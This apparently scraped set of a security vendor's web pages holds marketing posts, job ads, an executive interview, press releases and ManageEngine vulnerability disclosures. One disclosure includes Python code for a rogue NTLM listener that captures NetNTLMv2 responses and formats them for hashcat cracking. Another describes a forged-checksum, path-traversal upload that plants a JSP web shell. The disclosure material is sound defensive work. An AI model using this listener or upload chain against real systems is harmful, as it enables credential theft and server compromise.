According to the recent Verizon Data Breach Investigation Report, “we saw, yet again, that cybercriminals are still finding success with the same tried and tested techniques, and their victims are still making the same mistakes.” The report also showed that web application attacks led the way as the most common breach pattern. It seems history is intent on repeating itself. However it has also become more evident that new flavors of ransomware and botnets like Mirai will continue to invade infrastructures as attackers work to refine their craft.

The Catch-22 of Web Apps.

As organizations try to remain agile and innovative, the pressure of speed to market, staying agile, and remaining relevant are just some of the ‘Catch-22s’ and harsh realities for a modern business. Sure, the benefits of web applications are undeniable, but rushed application development, bypassing stringent code review and testing, and default credentials are just some of the struggles that can inhibit innovation or open up more holes for hackers to exploit.

“There’s an App for That.”

We haven’t heard that in a while! Even app stores and apps for phones and tablets pose a significant risk and benefit for organizations. ‘We’ want an app for everything, and app developers are scrambling to put in new features and functionality to stay in the game. The more apps we have, the more potential attack surfaces and vectors exist, and we have to prepare for them to be exploited. It can be a vicious cycle.

Hacks by way of web applications have steadily been on the rise, likely due in part to the growing adoption by organizations of the Internet of Things (IoT), of which many devices have web interfaces, and to mobile device adoption. According to a recent 2018 Symantec report, the “Internet of Things (IoT) attacks increased 600% between 2016 and 2017.” It’s just simple math, right? The more web interfaces there are, the more you need to scan them for vulnerabilities to protect them and avoid cyber incidents such as DDoS attacks. But the truth is the math is the only simple thing about it, or we wouldn’t all be scrambling to stay ahead of these threats.

The Cart Before the Horse?

The more hackers succeed and fail, the more knowledge they gain, and the faster we have to work to try to head them off at the pass. Putting a Web Application Firewall (WAF) in place to protect your web applications isn’t enough anymore. History has proven that we are seeing more variations of attack vectors, and consequently an organization needs to proactively prepare for the inevitable attack by scanning for weaknesses.

If you’re thinking you’ve put the cart before the horse by moving to the cloud but are just now realizing what needs to be done for web application security, you probably did. The good news is that you’re not alone, and it isn’t too late to put safeguards in place to protect the application layer of your key assets, while still reaping the rewards of innovative web applications.

It’s Not Too Late to Automate.

There are best practices to protect your web applications and solutions to help you get quick wins by leveraging key technologies such as Digital Defense’s Frontline WAS™. Our solution has been developed to provide the highest level of dynamic web application testing results through a system that is easily deployed and maintained. A Web Application Scanner can help your prioritization of the most critical vulnerabilities, saving you valuable resources through targeted remediation efforts.

As we continue through the second half of 2018, perhaps we can learn from historical data around vulnerabilities and breaches to unravel the cybercrime mystery that is no doubt never-ending. We may not be able to get ahead of all threats, but learning from the past is the best way to prepare for the future.

Mid-level Software Test Engineer in Research & Development

Careers

If you are passionate about quality software, if you have an interest in software security, and if you want to work with a team testing award-winning security scanning technology, Digital Defense, Inc. has an immediate opening for a Mid-level Software Test Engineer. Helping to test our next generation security technology platform, ideal candidates should have prior experience testing complex web applications, with experience testing security and/or cloud applications a major plus. Candidates will be expected to work closely with the test engineering team and contribute to testing of a large web application product and its various components.

Daily tasks may include:

Running manual and automated tests against pre-release versions of a complex web application

Documenting bugs and assisting in root-cause determination of issues

Working closely with developers to understand and test new features and code

Writing test cases and test strategy documentation for new features

Monitoring and reproducing customer reported issues

Validating bug fixes

Participating in and contributing to sprint planning meetings

Digital Defense is a profitable, privately held network security company with solid-growth, a great team-oriented culture and flexible work environment. We offer stock-options, 401k, health insurance and other standard benefits.

The candidate must live in or be willing to relocate to the San Antonio, TX, area.

Skills / Requirements:

Must be eligible to work in the U.S. without sponsorship

2+ years of experience testing production software, manual and automated testing

API Integration Development Engineer

Careers

Digital Defense has an immediate opening for a Software Developer to work in our Office of the CTO team, helping to research and implement 3rd party integrations to our Frontline Vulnerability Management platform. Candidates must have prior experience working on REST APIs, as well as with two or more programming languages, including Python or Perl and at least one other language.

You will learn about Vulnerability Management, as well as many other security technologies, including SIEM, NAC, GRC, IPS, and many more.

Digital Defense is a profitable, privately held network security company with solid-growth, a great team-oriented culture and flexible work environment. We offer stock-options, 401k, health insurance and other standard benefits.

The candidate must live in or be willing to relocate to the San Antonio, TX, area.

Skills / Requirements:

Highly proficient in at least one major scripting language: Python, Ruby or Perl.

Experience with at least one other programming language

Experience with Web applications and REST APIs.

Experience working with the Linux operating system.

Experience working with SQL databases such as Postgres or MySQL.

Good understanding of web network protocols such as HTTP, JSON, XML-RPC, SSL and REST API interaction.

Experience with designing and writing unit-tests for your code is a plus.

Education & Experience:

Bachelor’s degree in Computer Science or related technical field from an accredited university is preferable.

Personality:

Detail-oriented, with a passion for automation.

Must be capable of working both independently and as part of a dynamic team.

Desire the simple, elegant solution over the complex solution.

Other information:

All applicants must pass a credit and criminal background investigation prior to employment.

Blog

**Editor’s Note: “7 Minutes” is a feature where we ask channel executives from startups – or companies that may be new to the Channel Partners audience – a series of quick questions about their businesses and channel programs.**

Armed with its vulnerability management-as-a-service (VMaaS) platform and security awareness training, Digital Defense is taking aim at its competitors in the crowded cybersecurity market.

A security technology and services provider, Digital Defense recently was named a leading provider in two categories, cybersecurity training and education (No. 3) and compliance and risk management (No. 10) by Black Book Market Research. It surveyed nearly 2,500 security professionals from 680 provider organizations.

In April, the company announced Frontline.Cloud was deployed in the Amazon Web Services (AWS) Cloud. The deployment allowed its Alliance Partners, MSSPs, SIs and VARs to address customers’ security-assessment needs in compliance with the General Data Protection Regulation (GDPR).

In a Q&A with Channel Partners, Rosanna Pellegrino, Digital Defense’s senior vice president of sales and business development, talks about what gives her company and its partners a competitive advantage, as well as the company’s evolving platform.

Rosanna Pellegrino: The secret selling (sauce) for partners is to make it easy to use, easy to deploy and easy to manage. It allows customers to quickly get up and running on our platform and provides information that’s operational immediately. Customers get to look at their environment in a simple way and know immediately what needs to be addressed. For partners, it’s the tip of the spear. This allows partners to start conversations regarding security within their customers’ environments very easily.

We make the whole process easier for resellers and easy for their customers. That’s what I think is the most important piece. It’s not just only, “What can you do for my environment?” but also, “How can it make me more secure?” The ability to identify the vulnerabilities and minimize the false positives is important. The quality of the output of the reports, the fidelity of the data, and just the whole experience of dealing with the organization are key. A reseller can take Digital Defense to their customers with confidence because the last thing they want to do is bring in a product that fails and not be able to call into that account again. And then secondly, it helps them penetrate into new accounts with a product that is effective, efficient, has quality of output and is differentiated in the market.

CP: Describe your channel program — metal levels, heavy on certifications, open or selective, unique features? Do you work with masters and/or distributors?

RP: No tiers, no certifications and no levels because we’re looking for strategic partners — ideally partners that can wrap services around our offering because it makes a more complete solution to their end users. What we do for them is protect them in the opportunity. We offer deal registration, which is an industry standard, but we also offer protection around deal enablement and fulfilment. If they bring us a deal, then at the end the customer procurement team needs to get additional bids, (and) we protect their enablement margin. Anybody that comes to us saying they want to bid this opportunity gets a fulfillment margin. There is a huge delta in that so that they can’t come in and take the deal away from a partner that’s actually worked the deal. That’s protection, more than just incentive. If you put the time in, we will protect you through every opportunity and to ensure that account ownership. (No work with masters or distributors.)

CP: Quick-hit answers: Percentage of sales through the channel, number of partners, average margin. Go.

CP: Who are your main competitors, and what makes your offering better?

RP: Rapid 7, Qualys, Tenable. And what makes us better is our offering. There’s no hardware or software for partners to maintain. Digital Defense maintains all that, eliminating the burden. All of Digital Defense’s platform resides within the AWS platform. The patents we have on our technology differentiate us from competitors because those patents actually remove the pain points that customers have today with many other platforms.

At the end of the day, what makes me different than my competition is our platform. It makes the end users’ job easier because there are [fewer] false positives, it is easy to use, easy to deploy, and then we have a team of subject-matter experts that they can call on when questions arise or they need something researched. We supply a staff of resources that are dedicated to our customers, so they would know the person’s customer and partner contacts by name. And for the reseller, it helps because the reseller can go, “OK, Mr. Customer, let’s call your client advocate or I can call your client advocate and we can work through this issue.” It makes it a seamless process and everybody’s working together, and it’s not a pool of people all over the world where you might not get the same guy and have to re-explain yourself each time you call in.

CP: How do you think your technology portfolio will change in the next three years?

RP: The current platform will continue to evolve. There are areas that Digital Defense is looking to expand in that will enhance and complement our offerings. In other areas it will be more strategic to partner with best-in-class platforms where there is benefit to our mutual customers to integrate. As our competitors evolve, they’re looking to capture revenue by getting into other areas … where they are encroaching on their partners’ customer products. We’re developing our platform, making sure that it continually evolves and identifies vulnerabilities, and gives you good, clean data. But having said that, there are some complementary overlays or adjacent areas that we may want to bring into the platform to see how we can make it even stronger and more effective for our customers.

For example, Digital Defense’s move into the cyber threat space occurred as a result of expressed interest from our client base and a strategic focus on growth through expansion of products and services that are adjacent to the company’s core security assessment offerings. The new cyber-threat line provides a natural complement to our current suite of solutions. Our clients can now receive relevant, actionable threat intelligence, gleaned from the dark, deep and surface web which may help thwart current or future cyberattacks through high quality cyber threat evaluations.

CP: How do you expect your channel strategy to evolve over that time frame?

RP: From a strategic perspective, as I look at my current channel partners and as the threat landscape changes, the platform supports their changing business to address their customer needs. Businesses need to get to the point where they could remediate or be proactive, so I see the platform evolving to a point that it helps strengthen the partner offering, therefore strengthening the security posture of their customers. Most organizations are still evolving from a security maturity perspective. There isn’t enough talent and expertise to fill the gaps today. So for Digital Defense, being able to provide something that helps them become subject-matter experts to their customers helps them (as well as us) grow.

CP: What didn’t we ask that partners should know?

RP: Customers and resellers should know that our Frontline platform is a highly scalable, very stable platform that provides relevant, actionable data at competitive pricing. For partners, that translates into opportunities because it differentiates them. What partners need to consider is everyone is selling multiple competing solutions. When you go into an opportunity, you might have three or four guys quoting the same product (in a tiered partner structure). You might be going up against a competitive reseller, at a disadvantage as their margin is maybe a 40 percent discount and you may only get 20 percent, so you’re already at a disadvantage especially when you’re trying to break into new accounts. What we offer is a stable, scalable, effective product that differentiates you, and also protects your margins and your price point.

https://www.digitaldefense.com/blog/why-gdpr-compliance-icing-on-the-security-cake/
2018-05-21 | Kim Carlos

Why GDPR Compliance Should Just Be “The Icing” on the Security Cake

Blog

With the deadline for GDPR compliance only 5 days away, the countdown is on and the panic is setting in. But why? While the U.S. has historically been a highly regulated country, the EU’s data privacy regulations have not kept up with the evolving threats, until now.

The GDPR is vast and so wide-reaching that it affects countries outside the EU if they hold or process any EU citizen data. But you probably already know that or you wouldn’t be reading this. The real question is, why should you not care?

Why GDPR compliance shouldn’t be your focus.

The ‘fear-factor’ messaging is running rampant among vendors positioning their solutions as a failsafe for compliance. It is easy for company leaders to get swept up in the hype and forget what the GDPR is really about: security. After all, you can’t keep data private without securing it, and you can’t comply without keeping data private.

Organizations have been checking off boxes for compliance since requirements were put around governance and risk management. But checking off boxes without assessing where an organization is truly vulnerable is exactly what has led to the constant headlines about hacks and data theft.

If security is your primary goal, you can back into compliance requirements and check off that little box that makes us all feel so accomplished, while knowing you’re doing the right things to protect PII and your brand reputation.

Where to start? Keep it simple.

Start by knowing where you are susceptible to a data breach with a vulnerability scan.

Digital Defense provides services to organizations subject to the GDPR by aiding them in securing their assets and network to demonstrate that appropriate measures are implemented to protect the GDPR in-scope data. In the event enforcement measures are taken against an organization due to a breach of GDPR, our services like Frontline VM™, Frontline WAS™, etc., prove due diligence in adhering to a code of conduct or certification in compliance with data protection principles.

Vulnerability management, risk assessments, data privacy and protection are really all just kissing cousins. If your ultimate goal is security and you do the right things to protect your data, complying with regulations will just be the icing on the cake.

Leverage the GDPR driver to push through security initiatives.

Whether you are a global, U.S. or Canadian company, the GDPR likely applies to your business; even if it somehow doesn’t, it is definitely a data privacy best practice to implement as it clearly calls out ISO 27001 as a framework to help comply. The fines can be astronomical, up to 4% of annual global turnover or €20 Million (whichever is greater). What better reason than that to have budget align with putting innovative security safeguards in place?

Burying your head in the sand is a surefire way to tank your brand trust because hackers are just getting more efficient and sophisticated. They will come at you again and again. Will you be prepared? Organizations that put the security of customer and employee data first are the resilient brands that stand the test of time–and of breach.

Click here to find out how Digital Defense can help with GDPR compliance efforts.

Black Book Market Research LLC surveyed over 2,464 security professionals from 680 provider organizations to identify gaps, vulnerabilities and deficiencies that persist in keeping hospitals and physicians proverbial sitting ducks for data breaches and cyberattacks. One frightening statistic uncovered was that thirty-two percent of healthcare organizations did not scan for vulnerabilities before an attack.

“HIPAA does not specifically require a penetration test or vulnerability scan. It does, however, require covered entities to perform risk analysis and test security controls – of which vulnerability scanning and penetration testing are integral,” said Larry Hurtado, CEO of Digital Defense, Inc. “Further, NIST has issued a special recommendation for HIPAA that calls for penetration testing of security controls to determine actual vulnerability exposure, as well as the need for deficiency documentation such that appropriate remediation steps can be taken.”

Leveraging the company’s industry recognized and awarded vulnerability scanner, to run scans that don’t interfere with daily business operations, is just one way Digital Defense is helping IT personnel safeguard data. They also got creative and developed an effective and entertaining security awareness program (SecurED®) designed to optimize employee retention of essential security best practices.

Digital Defense continues to pioneer cloud-based solutions and expand its research staff to provide new system capabilities, offerings, and critical compliance and cyber risk insight including:

A Cyber Threat Management solution that scans the Dark Web and provides actionable threat intelligence to help thwart current or future cyber-attacks.

A Vulnerability Research Team that continues to uncover critical zero-day vulnerabilities in industry leading technologies.

About Digital Defense
Serving clients across numerous industries from small businesses to very large enterprises, Digital Defense’s innovative and leading-edge technology helps organizations safeguard sensitive data and eases the burdens associated with information security. Frontline.Cloud, the original Vulnerability Management as a Service (VMaaS) platform, delivers consistently accurate vulnerability scanning and penetration testing, while SecurED®, the company’s security awareness training, promotes employees’ security-minded behavior. The Digital Defense Frontline suite of products, underpinned by patented technology and complemented with unparalleled service and support, is highly regarded by industry experts, as illustrated by the company’s designation as Best Scan Engine by Frost & Sullivan, five-star review in SC Magazine and inclusion in CRN’s MSP 500.

Biography and Background:
Rosanna Pellegrino brings more than 30 years of experience within IT Security, professional services, product strategy and technology integrations to Digital Defense in her role as SVP of Sales and Business Development. Pellegrino is responsible for all sales and channel development, strategic alliances and global market coverage. Previously, she established strategic go-to-market channel partnerships with KPMG, PWC, ePlus, Dimension Data and others. Pellegrino built a global network of sales channels and managed technology integrations with KPMG, PWC, ePlus, Dimension Data, CheckPoint Software, BAE, Carbon Black, McAfee and many others. With Qualys she headed up product strategy and integrations, with partners including Dell SecureWorks and Accenture. She also led global business development for RedSeal Networks, where she established technology and go-to-market partnerships with McAfee, Symantec, Palo Alto, Cisco and others.

How have you personally helped advance your company’s channel business over the past year?
Over the last year, I have created an easy-to-do-business-with channel program that allows partners a path to success. What does easy mean? For a channel partner it represents the following:
1. Easy to get support – dedicated Channel Account Team, along with Technical Account Managers that can work with customer requests
2. Easy to quote – the ability for quick creation of proposals outlining customer requests
3. Deal protection – not only do partners have the ability to register new deals for increased margins but also protection on renewals for their customer base

What are your goals for your company’s channel business over the next year?
Goals for the channel business are to increase joint revenue opportunities, but also to ensure that these partners are supported and can take advantage not only of the Frontline platform but also of the strategic technology integrations, to provide a holistic solution to their customer base. The ability to understand how Frontline fits into enterprises’ ecosystems will give partners a strategic advantage, as they will be able not only to position Frontline but also to show how it fits into the overall workflow of the customer environment, thus reinforcing their expertise and value to the customer.

What honors, awards, or commendations have you won over the past year?
none

Outside of your family, please name a woman you admire and why:
The women that I admire are not known to the world, nor do they have fame or fortune. They are simply selfless individuals who give of themselves with little or no acknowledgement. These women silently accomplish so much, making others around them more comfortable, productive and/or successful. For me it is taking the time to notice these contributions to the world around us and acknowledging these women each day. I would recommend that each of us take time out of our day to notice these women, who are much deserving of our admiration but too often not acknowledged.

What advice would you give your 16-year-old self?
Best advice I could have given myself is to have confidence in my ability to learn new things. Once out of school you don’t stop learning new things, and don’t let anyone tell you differently. Just because it is something new or unknown does not mean you cannot understand or apply it to your everyday life, either work or personal. If you have passion then you will be the best you can be no matter what you try. Do not measure your success or failures against others because your dynamics and life experiences make you different.

If you could master any new job-related skill, what would it be and why?
When starting out in the industry I was a technical resource to customers and partners; as my career has evolved, I miss those days. With the ever-changing landscape of new technology, it would be great to capture some things that I have missed or do not quite understand.

What’s the best book you read this past year and why did you like it?
I typically read technical journals and books.


I also took a look at how Windows Server Update Services (WSUS) handles this superseding situation. Once again, it only shows I am missing a ‘Moderate’ risk update and that I should manually “verify…the superseding update first.”

Blog

Facebook, Walmart, FedEx kick off the new year with data breach headlines

Although Facebook has dominated the cybersecurity media headlines over the past few weeks, and the hacks on major brands before that, a careful read through our latest cybercrime diary reveals that organizations of all types and sizes globally are under continual cyber attack.

“Cybercrime is rampant and continually evolving, so always look to minimize or ‘shrink your attack surface’ by understanding both present and past vulnerabilities,” says Gordon MacKay, EVP and CTO at Digital Defense, a trusted provider of security risk assessment solutions, protecting billions of dollars in assets for clients around the globe.

To view the complete entries of the 2018 CYBERCRIME DIARY, click here.

Blog

Organizations that procure cybersecurity services are increasingly looking not just for private cloud-based approaches, but products that operate from public cloud environments, says Larry Hurtado, CEO of security technology and service provider Digital Defense.

“First and foremost, our move to Amazon has primarily been to enable our clients to assess … premises, cloud and hybrid environments with relative ease,” he says. But the move will also facilitate easier scanning within the Amazon environment, he says, as well as enable organizations to better handle different countries’ data residency requirements.

In addition, the company is helping organizations seek out any stolen data or information that might be in circulation on the dark web via improved threat management capabilities.

Hurtado is president and CEO of Digital Defense. Previously, he co-founded and served as president of international operations for Elastic Networks and served as vice president of business line management for Nortel Networks.

ManageEngine Disclosure #3

Blog

Digital Defense is disclosing vulnerabilities identified in ManageEngine’s ADSelfService Plus application. ManageEngine was prompt in responding to the identified flaws and providing fixes for these security issues.

Details: The ADSelfService Plus product is vulnerable to a Server-Side Request Forgery (SSRF) which can be leveraged to capture NTLM hashes when the service is configured to run with heightened privileges: the server can be induced to authenticate to an attacker-controlled host, and the captured hash can then be relayed to other assets. This application is often configured with heightened privileges for Active Directory password resets and is frequently exposed externally.
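The disclosure above describes the outcome (an NTLM hash captured via SSRF and relayed) without publishing the request parameter, so the SSRF itself is not reproduced here. What a rogue listener does once the server connects to it is shown below as an added example; this is not ManageEngine or Digital Defense code. The message layouts follow the public NTLMSSP specification ([MS-NLMP]); the user, domain, workstation and response bytes are constructed so the parser has something to consume, and the NetNTLMv2 material is emitted in the hashcat -m 5600 line format.

```python
"""Rogue NTLM listener logic: what an SSRF-coerced NTLM authentication hands an attacker.

Added example; not ManageEngine or Digital Defense code. Only the NTLMSSP
message handling is shown; the SSRF that coerces the connection is not.
"""
import struct

NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
MSG_CHALLENGE = 2
MSG_AUTHENTICATE = 3
FLAG_UNICODE = 0x00000001
FLAG_NTLM = 0x00000200
AUTH_HEADER_LEN = 64  # signature, type, six field descriptors, flags (no Version or MIC)


def _descriptor(payload: bytes, base: int, body: bytearray) -> bytes:
    """Append payload to the variable-length body; return its (Len, MaxLen, Offset) descriptor."""
    offset = base + len(body)
    body.extend(payload)
    return struct.pack("<HHI", len(payload), len(payload), offset)


def build_challenge_message(server_challenge: bytes) -> bytes:
    """Minimal CHALLENGE_MESSAGE (Type 2) the listener returns; the attacker chooses the challenge."""
    if len(server_challenge) != 8:
        raise ValueError("server challenge must be 8 bytes")
    flags = FLAG_UNICODE | FLAG_NTLM
    return (NTLMSSP_SIGNATURE + struct.pack("<I", MSG_CHALLENGE)
            + struct.pack("<HHI", 0, 0, 48)        # empty TargetName, payload starts at byte 48
            + struct.pack("<I", flags) + server_challenge
            + b"\x00" * 8                          # Reserved
            + struct.pack("<HHI", 0, 0, 48))       # empty TargetInfo


def build_authenticate_message(user: str, domain: str, workstation: str, nt_response: bytes) -> bytes:
    """Constructed AUTHENTICATE_MESSAGE (Type 3); in a real capture this arrives from the victim."""
    body = bytearray()
    lm = _descriptor(b"\x00" * 24, AUTH_HEADER_LEN, body)
    nt = _descriptor(nt_response, AUTH_HEADER_LEN, body)
    dom = _descriptor(domain.encode("utf-16-le"), AUTH_HEADER_LEN, body)
    usr = _descriptor(user.encode("utf-16-le"), AUTH_HEADER_LEN, body)
    wks = _descriptor(workstation.encode("utf-16-le"), AUTH_HEADER_LEN, body)
    key = _descriptor(b"", AUTH_HEADER_LEN, body)
    flags = struct.pack("<I", FLAG_UNICODE | FLAG_NTLM)
    return (NTLMSSP_SIGNATURE + struct.pack("<I", MSG_AUTHENTICATE)
            + lm + nt + dom + usr + wks + key + flags + bytes(body))


def _read_field(msg: bytes, pos: int) -> bytes:
    """Resolve a (Len, MaxLen, Offset) descriptor at pos, refusing offsets past the message end."""
    length, _max_len, offset = struct.unpack_from("<HHI", msg, pos)
    if offset + length > len(msg):
        raise ValueError("field descriptor points past end of message")
    return msg[offset:offset + length]


def parse_authenticate_message(msg: bytes, server_challenge: bytes) -> dict:
    """Extract identity and NetNTLMv2 material; 'hashcat' is the -m 5600 input line."""
    if len(msg) < AUTH_HEADER_LEN or msg[:8] != NTLMSSP_SIGNATURE:
        raise ValueError("not an NTLMSSP message")
    if struct.unpack_from("<I", msg, 8)[0] != MSG_AUTHENTICATE:
        raise ValueError("not an AUTHENTICATE_MESSAGE")
    flags = struct.unpack_from("<I", msg, 60)[0]
    enc = "utf-16-le" if flags & FLAG_UNICODE else "cp1252"  # OEM strings if UNICODE not negotiated
    nt_response = _read_field(msg, 20)
    domain = _read_field(msg, 28).decode(enc)
    user = _read_field(msg, 36).decode(enc)
    if len(nt_response) <= 24:
        raise ValueError("NTLMv1 response; this example handles NTLMv2 only")
    nt_proof, blob = nt_response[:16], nt_response[16:]  # NTLMv2: 16-byte NTProofStr, then the blob
    return {
        "user": user,
        "domain": domain,
        "hashcat": f"{user}::{domain}:{server_challenge.hex()}:{nt_proof.hex()}:{blob.hex()}",
    }
```

The listener never sees a password; it sees a response keyed to a challenge it chose, which is why the same capture can either be cracked offline or, while the connection is still open, relayed to a second host that accepts NTLM. Disabling NTLM where possible, requiring SMB signing and Extended Protection for Authentication, and not granting a password-reset service domain-wide privileges are the mitigations that matter independently of the SSRF fix.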

Research & Development: VRT Engineer

Careers

Digital Defense Inc. is looking for a Vulnerability Research Team (VRT) Engineer to work in our Research & Development division on our next-generation security product offerings. This job will entail working on our network-scanning technology which sweeps networks for various vulnerabilities and threat conditions. Applicants should have backgrounds working with languages such as Python or Perl and a good understanding of sockets and network programming and ideally a passion for cyber-security tools and techniques.

Ideal candidates would have the following:

Experience working with programming languages such as Python or Perl on Linux systems.

High Interest in Security / Penetration Testing / Hacking Techniques is a plus.

Recent graduate with a college degree in a technical field such as Computer Science or Information Assurance.

(We’ll also consider candidates with solid work experience in place of this)

Solid understanding and familiarity with the Linux operating system.

Solid understanding of network protocols and tools such as Wireshark.

Experience working with virtualization technology such as VMware is a plus.

Experience working with software version control systems such as Git or Mercurial is a plus.

Some experience working with standard info-sec toolchains such as Nmap, Metasploit, and Burp Suite is considered a plus.

Other information:

All applicants must pass a credit and criminal background investigation prior to employment

Relaxed dress code and fun team oriented work environment

About Digital Defense:

Digital Defense is a growing, profitable, privately held company in the San Antonio area with a great team oriented atmosphere and a focus on building out next-generation security technology and services. We’ve recently been recognized by SC Magazine (2017 Best Buy – Vulnerability Management), Frost & Sullivan (2017 – Best Scan Engine), San Antonio Business Journal (Tech Titans: Top Cybersecurity Company), and the Cybersecurity 500 (#16) for our technology and growth.

Launch of Cyber Threat Management Offering

Blog

San Antonio, TX—April 11, 2018—Digital Defense, Inc., a security technology and services provider, today announced the launch of a new product line offering, Frontline Cyber Threat Management (Frontline CTM™), a trio of predictive cyber intelligence solutions. The introduction of the cyber threat line provides organizations with early warning of serious threats that, without knowledge of the potential exposure, could result in compromise and negative repercussions.

Digital Defense’s move into the cyber threat space occurs as a result of expressed interest from the firm’s client base and a strategic focus on growth through expansion of products and services that are adjacent to the company’s core security assessment offerings.

Larry Hurtado, president and CEO, states, “The introduction of the Frontline CTM line is a natural complement to Digital Defense’s current suite of solutions. Our clients will receive relevant, actionable threat intelligence, gleaned from the “Dark Web”, which may help thwart current or future cyber-attacks through high quality cyber threat evaluations.”

The Frontline CTM line includes:

At-a-Glance summary of high level external threats and risks to an organization’s brand, technology infrastructure, data and employees. Real-time data collection from the surface, deep and Dark Web offers insight into activity around an organization’s digital assets.


Digital Defense, Inc.

Frontline VM™ Scores among Top 3 of 12

in VRM “Current Offering” Category

San Antonio, TX—March 05, 2018—Digital Defense, Inc., a security technology and services provider, has been named a Strong Performer in The Forrester Wave™: Vulnerability Risk Management, Q1 2018 report.

The report focuses on key vulnerability risk management criteria – now more important than ever for security and risk management professionals who increasingly rely upon VRM to address leading IT security challenges. Traditional vulnerability management focused on vulnerability enumeration, and low false-positive reporting therein. As the Forrester Wave report states, the VRM process includes asset identification, enumeration, prioritization, and remediation.

“Our solution priorities have remained consistent and clear – first provide the industry’s highest level of assessment accuracy; next provide the best ease of use via prioritization and remediation,” said Mike Cotton, Senior Vice President of Engineering at Digital Defense. “To be named a Strong Performer – and to have Forrester, in our opinion, validate the importance of those needs for modern buyers – tells us we are delivering the value that matters.”

A copy of the Forrester WAVE, Vulnerability Risk Management report can be downloaded here.

Leverage the power of Frontline VM with a no cost 30 day evaluation. Register here.


Digital Defense Launches AWS-Based Frontline.Cloud Platform

Digital Defense, Inc.

Pioneer of Cloud Solutions Further Simplifies Assessing

Security of Hybrid Networks

San Antonio, TX—April 4, 2018—Digital Defense, Inc., a security technology and services provider, announced the company’s proprietary platform, Frontline.Cloud, is now deployed in the Amazon Web Services (AWS) Cloud. Housed entirely in AWS, the platform, already industry recognized for ease of use and rapid deployment, now offers organizations significant administration efficiencies for assessing premise-based, cloud, or hybrid network implementations.

The Frontline.Cloud Platform supports multiple offerings including Frontline Vulnerability Manager™, Frontline Penetration Testing™, and Frontline Web Application Scanning™, all of which are now available in the AWS environment. Regardless of whether assets are located in the cloud, on customer premises, or both, Frontline.Cloud systems can be used to evaluate the security posture of systems, networks, and applications. Underpinned with patented security scanning and results management technologies, the Frontline.Cloud platform delivers high quality results and includes unified management and comprehensive reporting. Extensive application programming interfaces are also available, enabling tight integration with third-party cloud and/or premise-based systems, resulting in effective automation of security operations.

“Having Frontline.Cloud available through AWS provides tremendous value for organizations wanting to proactively secure networks and applications,” said Larry Hurtado, CEO, Digital Defense, Inc. “As a native cloud-designed system, the cost, startup time, and complexity associated with assessing hybrid environments with multiple management consoles are eliminated. The simplicity of deployment and manageability gives organizations a platform designed to meet their changing needs. Frontline.Cloud also automates the time-intensive process of VPC connection setup and maintenance. Additionally, the platform can scale to hundreds of thousands of assets on a single system.”

The Frontline.Cloud AWS deployment enables Digital Defense’s Alliance Partners, Managed Security Solution Providers (MSSPs), System Integrators (SIs), and Value-Added Resellers (VARs) to easily address the security assessment needs of their customers in a GDPR-compliant manner. New customers also have a fast path to trial or deployment, and existing customers can quickly and easily administer on-demand assessments to respond to an acute security threat or to evaluate the health of IT assets associated with an M&A event.


Digital Defense, Inc.

When: June 4-6, 2018

Where: Gaylord National Harbor Resort, National Harbor, MD

Digital Defense, Inc. is proud to announce that we are a Silver Sponsor at this year’s Gartner Security & Risk Management Summit. We invite you to visit us at booth #129 to hear more about Frontline.Cloud, our industry recognized security assessment platform, now residing in the Amazon Web Services (AWS) cloud.

Digital Defense Sponsors Medina Valley CyberPatriot Program

Digital Defense, Inc.

San Antonio, TX—March 23, 2018—Digital Defense, Inc., a security technology and services provider and longtime supporter of the CyberPatriot program, is pleased to announce its sponsorship of the Medina Valley CyberPatriot program.

CyberPatriot is the National Youth Cyber Education Program created by the Air Force Association (AFA) to inspire K-12 students toward careers in cybersecurity or other science, technology, engineering, and mathematics (STEM) disciplines critical to our nation’s future.

Frederick F. Hall, Medina Valley CyberPatriots coach, shared, “The vision of the Medina Valley CyberPatriots program is to promote cyber awareness, computer security practices, and cyber ethics. All of these are essential attributes for creating a secure network infrastructure, teaching the students how to detect threats, and how to defend against cyber-attacks in a safe virtual environment.”

Digital Defense has been actively engaged with area educational institutions such as Medina Valley and Southwest High School through mentorships and the donation of equipment in support of the school’s participation in the national CyberPatriot initiatives. As a sponsor of the upcoming San Antonio Mayor’s Cyber Cup Luncheon on Saturday March 24th, the company will be present to cheer on and recognize area CyberPatriot teams.

Larry Hurtado, president & CEO of Digital Defense states, “We believe it is important to actively nurture education programs such as the Medina Valley CyberPatriot curriculum to ensure that our communities are fostering cyber talent that will help to fill the important positions within organizations around the globe that are essential to fighting cybercrime.”


ManageEngine Disclosure #2

Blog

Digital Defense is disclosing multiple additional vulnerabilities identified on various ManageEngine applications discovered by our Vulnerability Research Team (VRT). We commend ManageEngine for their prompt response to the identified flaws and their engineering team’s work with VRT to provide fixes for these cyber security issues.

ManageEngine has provided patches for each of the vulnerabilities identified on the applications. The patched applications can be downloaded from ManageEngine’s website.

Details:

Impact: Remote code execution with the same privileges as the user that started EventLog Analyzer.

Application/Version Affected:

EventLog Analyzer 11.8 (Build 11080)

Log360 5.3 (Build 5036)

Details: The com.adventnet.sa.agent.UploadHandlerServlet class can be accessed via POST requests to /agentUpload. The servlet expects a multipart POST request containing a zip file and a “chksum” parameter containing an encrypted MD5 checksum of the uploaded zip file. The servlet decrypts the “chksum” parameter using the “decrypt” method of the EnDecryptImpl class. After decrypting the user supplied MD5 checksum, the servlet generates its own MD5 checksum of the uploaded zip file and compares the two values. If the comparison fails, the uploaded file is deleted. If the comparison is successful the uploaded filename is processed by the com.adventnet.sa.server.agent.DataProcessor class.

The “unzipFile” method of the DataProcessor class extracts the zip file and checks to see if at least one string from a set of strings is in the filename before writing the file. The list of strings used for the comparison is related to the types of files the class expects to be processing. No authentication is required to access the UploadHandlerServlet via /agentUpload, the “chksum” parameter is encrypted using a static key (so an attacker can produce a valid checksum for any archive), and no sanitization is performed on the filenames in the uploaded zip before extracting them. Together these can be leveraged to upload a zip containing a JSP web shell whose filename carries a directory traversal sequence, so that the web shell is written to the web root when the DataProcessor class extracts it.

Impact: Full compromise of the Applications Manager application which can be leveraged to execute arbitrary code as SYSTEM when running on Windows, resulting in full host compromise.

Application/Version Affected:

Applications Manager 13 (Build 13420)

